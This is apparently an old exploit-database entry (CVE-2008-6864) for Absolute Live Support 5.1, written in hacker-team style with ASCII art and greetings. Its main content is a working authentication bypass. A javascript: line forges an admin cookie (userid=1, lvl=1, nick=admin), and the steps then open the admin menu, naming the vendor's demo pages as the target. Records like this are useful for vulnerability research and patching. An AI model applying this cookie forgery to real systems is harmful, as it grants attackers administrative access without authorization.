Absolute Live Support 5.1 - Insecure Cookie Handling
Author: Hakxer
type: webapps
platform: php
port:
date_added: 2008-10-30
date_updated:
verified: 1
codes: OSVDB-55880;CVE-2008-6864
tags:
aliases:
screenshot_url:
application_url:
###############################################################################################
_____ ____ __ ___ ______ ______ | ____ _____ _____
| / ___| \ \ / / / ____| / | | | | _ \ |
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____
| | |_ || | | | |____ | | | | | | _ | |
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|
[~] Discovered By: Hakxer
[~] Home : Www.educ-up.com
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Live Support [see script] http://www.xigla.com/absolutelsnet/demo.htm
[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
[~] Team : EgY Coders
#################################################################################################
Exploit : First go to http://www.xigla.com/absolutelsnet/demo/login.aspx
Second Execute JS Code
[~] javascript:document.cookie="xlaALSDEMOadmin=userid=1&lvl=1&nick=admin&mywelcome=Hi, How may I help you";
Now Go to http://www.xigla.com/absolutelsnet/demo/menu.aspx
--- Proud To Be A Muslim ---
# _=END=_ #
# milw0rm.com [2008-10-31]